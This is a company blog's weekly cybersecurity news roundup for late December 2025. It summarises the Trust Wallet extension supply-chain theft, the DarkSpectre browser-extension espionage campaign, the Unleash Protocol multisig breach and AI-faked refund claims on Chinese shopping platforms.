---
title: "Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29, 2025] | DuoCircle"
description: "Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29."
image: "https://www.duocircle.com/images/og-default.png"
canonical: "https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-1-of-2026/"
---

Quick Answer

Week ending December 29, 2025 covered: a Trust Wallet supply-chain attack that stole approximately $8.5 million in crypto after attackers used exposed GitHub developer secrets and a Chrome Web Store API key to push tampered extension v2.68 on December 24, 2025, exfiltrating seed phrases for 2,520 wallet addresses to metrics-trustwallet\[.\]com (fixed in v2.69); the Koi Security DarkSpectre campaign linking malicious browser extensions on Chrome, Edge, and Firefox to Chinese actors, with 2.2 million users affected and 8.8 million across the related ShadyPanda and GhostPoster campaigns over seven years (the recent Zoom Stealer wave used 18+ extensions to harvest meeting metadata from Zoom, Google Meet, Teams, WebEx, and GoTo Webinar); a $3.9 million theft from Unleash Protocol after an unauthorized smart-contract upgrade through compromised multisig signing rights, with 1,337 ETH funneled through Tornado Cash; and a rise in AI-generated refund-fraud images on Chinese e-commerce platforms (RedNote, Douyin), with Forter reporting a 15%+ global increase in AI-altered refund claims this year.

Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News \[December 29, 2025\]

Your browser does not support the audio element.

[ Download episode](https://media.mailhop.org/duocircle/images/2026/01/Trust-Wallet-Hack-Browser-Extension-Espionage-Unleash-Protocol-Loss---Cybersecurity-News-December-29-2025.mp3) 

Share 

[ ](https://www.linkedin.com/sharing/share-offsite/?url=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-1-of-2026%2F "Share on LinkedIn") [ ](https://twitter.com/intent/tweet?text=Trust%20Wallet%20Hack%2C%20Browser%20Extension%20Espionage%2C%20Unleash%20Protocol%20Loss%2C%20Cybersecurity%20News%20%5BDecember%2029%2C%202025%5D&url=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-1-of-2026%2F "Share on X/Twitter") [ ](https://www.facebook.com/sharer/sharer.php?u=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-1-of-2026%2F "Share on Facebook") [ ](https://reddit.com/submit?url=undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-1-of-2026%2F&title=Trust%20Wallet%20Hack%2C%20Browser%20Extension%20Espionage%2C%20Unleash%20Protocol%20Loss%2C%20Cybersecurity%20News%20%5BDecember%2029%2C%202025%5D "Share on Reddit") [ ](mailto:?subject=Trust%20Wallet%20Hack%2C%20Browser%20Extension%20Espionage%2C%20Unleash%20Protocol%20Loss%2C%20Cybersecurity%20News%20%5BDecember%2029%2C%202025%5D&body=Check out this article: undefined%2Fblog%2Fannouncements%2Fcyber-security-news-update-week-1-of-2026%2F "Share via Email") 

![cybersecurity news](https://media.mailhop.org/duocircle/images/2026/01/email-smtp-service-7865.jpg) 

This week’s [cybersecurity](/) news highlights how trust-based digital systems continue to be exploited across crypto platforms, browser ecosystems, and online marketplaces. Trust Wallet disclosed a major [supply-chain attack](https://www.securityweek.com/infostealer-malware-delivered-in-emeditor-supply-chain-attack/) that led to millions in stolen crypto, while researchers uncovered a **long-running browser extension** campaign tied to corporate espionage. 

A separate smart contract breach drained funds from Unleash Protocol, and **AI-generated images** are now being used to scale refund fraud across Chinese e-commerce platforms. Here’s what happened and why it matters.

## 1\. Trust Wallet Chrome Extension Hack Leads to $8.5 Million Crypto Theft

Trust Wallet has confirmed that a compromised Google Chrome browser extension was used to steal approximately [$8.5 million worth of cryptocurrency](https://www.cysecurity.news/2026/01/trust-wallet-chrome-extension-hack.html) from users, following a supply-chain attack traced back to November last year. The incident affected the **Trust Wallet Chrome extension** after attackers gained unauthorized access to its release pipeline.

According to the company, the breach occurred after developer GitHub secrets were exposed, giving attackers access to the extension’s source code and its **Chrome Web Store (CWS)** [API key](https://www.fortinet.com/resources/cyberglossary/api-key). With full CWS API access, the [threat actor](/phishing-protection/threat-actors-exploit-google-calendar-for-phishing-and-spoofing/) was able to upload malicious builds directly to the Chrome extension marketplace, bypassing Trust Wallet’s standard internal approval and review process.

[![ API access](https://media.mailhop.org/duocircle/images/2026/01/spf-record-7020.jpg)](https://media.mailhop.org/duocircle/images/2026/01/spf-record-7020.jpg)

_The attackers pushed a tampered version of the extension (v2.68) on December 24, 2025, embedding a backdoor designed to harvest wallet mnemonic seed phrases_. The [malware](/resources/malware-and-its-defense-mechanism) exfiltrated the data to attacker-controlled infrastructure hosted on a lookalike domain, metrics-trustwallet\[.\]com. Researchers found that the malicious code activated whenever the wallet was unlocked and collected seed phrases from all wallets **configured in a user’s account**, regardless of whether biometric or password authentication was used.

Security firm Koi reported that the stolen data was disguised as routine telemetry, making the activity difficult to detect **during casual code review**. Analysis also showed the attack was premeditated, with infrastructure staged weeks before the malicious update was deployed. The campaign ultimately impacted [2,520 wallet addresses](https://thecyberexpress.com/shai-hulud-attack-trust-wallet/).

Trust Wallet has since urged its roughly one million [Chrome extension users](https://www.infosecurity-magazine.com/news/shadypanda-infects-43m-chrome-edge/) to upgrade to version 2.69, which removes the malicious code. _The company has launched a reimbursement claims process for affected users and says it has added additional monitoring controls around its software release processes_.

## 2\. Chinese-Linked Malicious Browser Extensions Tied to Corporate Espionage Campaign

Security researchers have uncovered a [large-scale malicious browser extension campaign linked to a Chinese threat actor](https://thehackernews.com/2025/12/darkspectre-browser-extension-campaigns.html) that has quietly harvested corporate meeting data from millions of **users across major browsers**. The activity, tracked by Koi Security under the name DarkSpectre, has affected an estimated [2.2 million users of Google Chrome, Microsoft Edge, and Mozilla Firefox](https://cybernews.com/security/darkspectre-malicious-browser-extension-campaign/).

[![snapshot](https://media.mailhop.org/duocircle/images/2026/01/SMTP-email-6675.jpg)](https://media.mailhop.org/duocircle/images/2026/01/SMTP-email-6675.jpg)

DarkSpectre has now been linked to two earlier extension-based campaigns, ShadyPanda and GhostPoster, bringing the total number of impacted users across all three operations to more than **8.8 million over a seven-year period**. The campaigns relied on seemingly legitimate browser extensions that were later weaponized to steal data, manipulate search results, [hijack affiliate traffic](https://thehackernews.com/2025/05/hazy-hawk-exploits-dns-records-to.html), and conduct advertising fraud.

The most recent DarkSpectre operation, also referred to as the [Zoom Stealer campaign](https://www.bleepingcomputer.com/news/security/zoom-stealer-browser-extensions-harvest-corporate-meeting-intelligence/), involved at **least 18 extensions posing** as tools for recording or managing online meetings. Once installed, the extensions harvested sensitive meeting data in real time, including meeting links, embedded passwords, IDs, schedules, participant details, and webinar metadata from platforms such as Zoom, Google Meet, Microsoft Teams, Cisco WebEx, and GoTo Webinar. 

[Indicators linking the campaigns to China](https://www.cysecurity.news/2026/01/chinese-linked-browser-extensions.html) include command-and-control servers hosted on Alibaba Cloud, **Chinese-language artifacts** in the code, and infrastructure registrations tied to Chinese provinces.

## 3\. Unleash Protocol Loses $3.9 Million After Unauthorized Smart Contract Upgrade

Decentralized intellectual property platform Unleash Protocol has confirmed a security breach that led to the theft of about [$3.9 million in cryptocurrency](https://finance.yahoo.com/news/unleash-protocol-hit-3-9-120928861.html?guccounter=1&guce%5Freferrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce%5Freferrer%5Fsig=AQAAAHgnqTiySaHAt9W5swyALc97sF7q0mZthpGr-Yqj-6a2I9%5FC4gRCls7AS1emBasceYCez3txriXHToq8cOH3tApmsf%5Fy-XBG9YDe7pO-nVfGyR8Veud77BdUQ-n2fIAtZAzXKjzvOXVqKIkegRfKc8E76WYQdCUxg6rc7whiZEtR) after an unauthorized change was made to its smart contracts. The incident was disclosed on January 1, with blockchain security firm PeckShieldAlert separately estimating the total losses.

[![after an unauthorized ](https://media.mailhop.org/duocircle/images/2026/01/spf-record-check-7020.jpg)](https://media.mailhop.org/duocircle/images/2026/01/spf-record-check-7020.jpg)

Unleash said the attacker was able to gain enough signing permissions within its multisig governance system to act as an administrator. Using this access, the attacker pushed an unapproved contract upgrade that enabled [withdrawals that were never authorized by the Unleash team and fell outside normal governance procedures](https://www.cysecurity.news/2026/01/unleash-protocol-suffers-39m-crypto.html).

_Unleash Protocol is designed to turn intellectual property into tokenized blockchain assets that can be used in decentralized finance applications_. By exploiting the unauthorized upgrade, the attacker unlocked withdrawal features and drained several assets from the platform, including [USDC, wrapped IP, stacked IP, voting-escrowed IP, and wrapped Ether](https://www.scworld.com/brief/crypto-heist-pilfers-about-3-9m-from-unleash-protocol).

According to PeckShieldAlert, the stolen funds were then moved through third-party bridging services and sent to external wallets to make tracking more difficult. The attacker later deposited around **1,337 ETH into Tornado Cash**, a crypto mixing service often used to hide transaction trails.

Following the incident, Unleash Protocol has paused all platform activity and started a full investigation with **external security firms**. Users have been advised not to interact with Unleash smart contracts until further updates are shared through official channels.

[![attacker later deposited](https://media.mailhop.org/duocircle/images/2026/01/sender-policy-framework-7020.jpg)](https://media.mailhop.org/duocircle/images/2026/01/sender-policy-framework-7020.jpg)

## 4\. AI-Generated Images Fuel Refund Scams Across Chinese E-Commerce Platforms

Online sellers in China are dealing with a rising number of refund scams in which [fraudsters use AI-generated images and videos to fake damaged products](https://www.wired.com/story/scammers-in-china-are-using-ai-generated-images-to-get-refunds/). The issue is spreading across major e-commerce and social shopping platforms, many of which rely on **customer-submitted photos** instead of physical returns when approving refunds.

Merchants on platforms like **RedNote and Douyin** have shared several examples of suspicious claims. These include photos of bed sheets that appear unrealistically shredded, ceramic cups that look torn like paper, and shipping labels with distorted or unreadable text. Sellers say certain product categories are being targeted more often, especially fresh groceries, low-cost beauty items, and fragile products, since refunds in these cases are usually issued without requiring a return.

[![scam unraveled ](https://media.mailhop.org/duocircle/images/2026/01/spf-record-tester-7020.jpg)](https://media.mailhop.org/duocircle/images/2026/01/spf-record-tester-7020.jpg)

One case that gained widespread attention involved a live crab seller who received photos and videos claiming that most of the crabs arrived dead. The scam unraveled after the seller noticed clear inconsistencies, including **incorrect crab anatomy**. Police later confirmed the images were fabricated and briefly detained the buyer, making it one of the first known cases in [China where AI-based refund fraud](https://www.wired.com/story/scammers-in-china-are-using-ai-generated-images-to-get-refunds/) led to enforcement action.

T\_his trend isn’t limited to China. Fraud detection company Forter reports that the use of AI-altered images in refund claims has increased by more than 15 percent globally this year\_. Researchers warn that easy access to image-generation tools is lowering the barrier for large-scale refund fraud, pushing online platforms to rethink how **trust-based refund systems work**.

## Topics

cyber securityNewsSecurityUpdates 

![Brad Slavin](https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg) 

Brad Slavin 

General Manager

General Manager at DuoCircle. Product strategy and commercial lead across the email security portfolio.

## Secure your email infrastructure

Protect, authenticate, and deliver. Contact our team to find the right solution.

[Contact Sales](/contact/) [Explore Products](/products/) 

## Related Articles

[  News 6m  Microsoft Cybersecurity Transparency, Chrome Update Required, Google Calendar Phishing, Cybersecurity News \[December 23, 2024\]  Jan 2, 2025 ](/blog/announcements/cyber-security-news-update-week-1-of-2025/)[  News 7m  Bybit’s $1.5B Loss, FatalRAT Hits APAC, GitVenom Targets Wallets,, Cybersecurity News \[February 24, 2025\]  Mar 3, 2025 ](/blog/announcements/cyber-security-news-update-week-10-of-2025/)[  News 6m  LastPass Users Phished, Amazon Down US, UK Cybersecurity Boost, Cybersecurity News \[March 02, 2026\]  Mar 9, 2026 ](/blog/announcements/cyber-security-news-update-week-10-of-2026/)[  News 6m  Life Insurance Breach, Notorious Malware Identified, Fake Ransom Scam, Cybersecurity News \[March 03, 2025\]  Mar 10, 2025 ](/blog/announcements/cyber-security-news-update-week-11-of-2025/)

```json
{"@context":"https://schema.org","@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}],"sameAs":["https://www.linkedin.com/company/duocircle","https://x.com/duocirclellc","https://www.facebook.com/duocirclellc","https://www.g2.com/products/phish-protection-by-duocircle/reviews","https://github.com/duocircle","https://www.crunchbase.com/organization/duocircle-llc"],"contactPoint":{"@type":"ContactPoint","contactType":"customer support","url":"https://support.duocircle.com"},"knowsAbout":["Email Security","Email Authentication","SPF","DKIM","DMARC","Phishing Protection","Spam Filtering","SMTP Relay","Email Deliverability","Email Forwarding"]}
```

```json
{"@context":"https://schema.org","@type":"WebSite","name":"DuoCircle LLC","url":"https://www.duocircle.com","description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","publisher":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]}}
```

```json
[{"@context":"https://schema.org","@type":"BlogPosting","headline":"Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29, 2025]","description":"Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29.","url":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-1-of-2026/","datePublished":"2026-01-05T19:32:08.000Z","dateModified":"2026-01-05T20:04:09.000Z","dateCreated":"2026-01-05T19:32:08.000Z","author":{"@type":"Person","@id":"https://www.duocircle.com/authors/brad-slavin/#person","name":"Brad Slavin","url":"https://www.duocircle.com/authors/brad-slavin/","jobTitle":"General Manager","description":"Brad Slavin runs DuoCircle, the company behind DMARC Report, AutoSPF, Phish Protection, and Mailhop. His focus is product strategy, customer relationships, and the commercial and compliance side of email authentication (DPAs, SLAs, enterprise procurement).","image":"https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg","knowsAbout":["Email Security Strategy","SaaS Product Management","Enterprise Compliance","Customer Success","Email Deliverability Business"],"worksFor":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com"},"sameAs":["https://www.linkedin.com/in/bradslavin"]},"publisher":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"mainEntityOfPage":{"@type":"WebPage","@id":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-1-of-2026/"},"articleSection":"announcements","keywords":"cyber security, News, Security, Updates","wordCount":1083,"image":{"@type":"ImageObject","url":"https://media.mailhop.org/duocircle/images/2026/01/email-smtp-service-7865.jpg","caption":"cybersecurity news","width":900,"height":600},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".answer-block","h1"]}},{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https://www.duocircle.com/blog/"},{"@type":"ListItem","position":2,"name":"News"},{"@type":"ListItem","position":3,"name":"Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29, 2025]","item":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-1-of-2026/"}]}]
```

```json
{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.duocircle.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"https://www.duocircle.com/blog/"},{"@type":"ListItem","position":3,"name":"News","item":"https://www.duocircle.comundefined"},{"@type":"ListItem","position":4,"name":"Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29, 2025]","item":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-1-of-2026/"}]}
```

```json
{"@context":"https://schema.org","@type":"BlogPosting","headline":"Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29, 2025]","description":"Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29.","url":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-1-of-2026/","datePublished":"2026-01-05T19:32:08.000Z","dateModified":"2026-01-05T20:04:09.000Z","dateCreated":"2026-01-05T19:32:08.000Z","author":{"@type":"Person","@id":"https://www.duocircle.com/authors/brad-slavin/#person","name":"Brad Slavin","url":"https://www.duocircle.com/authors/brad-slavin/","jobTitle":"General Manager","description":"Brad Slavin runs DuoCircle, the company behind DMARC Report, AutoSPF, Phish Protection, and Mailhop. His focus is product strategy, customer relationships, and the commercial and compliance side of email authentication (DPAs, SLAs, enterprise procurement).","image":"https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg","knowsAbout":["Email Security Strategy","SaaS Product Management","Enterprise Compliance","Customer Success","Email Deliverability Business"],"worksFor":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com"},"sameAs":["https://www.linkedin.com/in/bradslavin"]},"publisher":{"@type":"Organization","name":"DuoCircle LLC","url":"https://www.duocircle.com","logo":{"@type":"ImageObject","url":"https://www.duocircle.com/images/duocircle-logo.png"},"description":"DuoCircle is a portfolio of specialized email products covering protection, authentication, delivery, and routing. We deliver about 90% of category-leader capability at roughly half the price, backed by experts who own the outcome. Trusted by 50,000+ organizations since 2014.","subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"mainEntityOfPage":{"@type":"WebPage","@id":"https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-1-of-2026/"},"articleSection":"announcements","keywords":"cyber security, News, Security, Updates","wordCount":1083,"image":{"@type":"ImageObject","url":"https://media.mailhop.org/duocircle/images/2026/01/email-smtp-service-7865.jpg","caption":"cybersecurity news","width":900,"height":600},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".answer-block","h1"]}}
```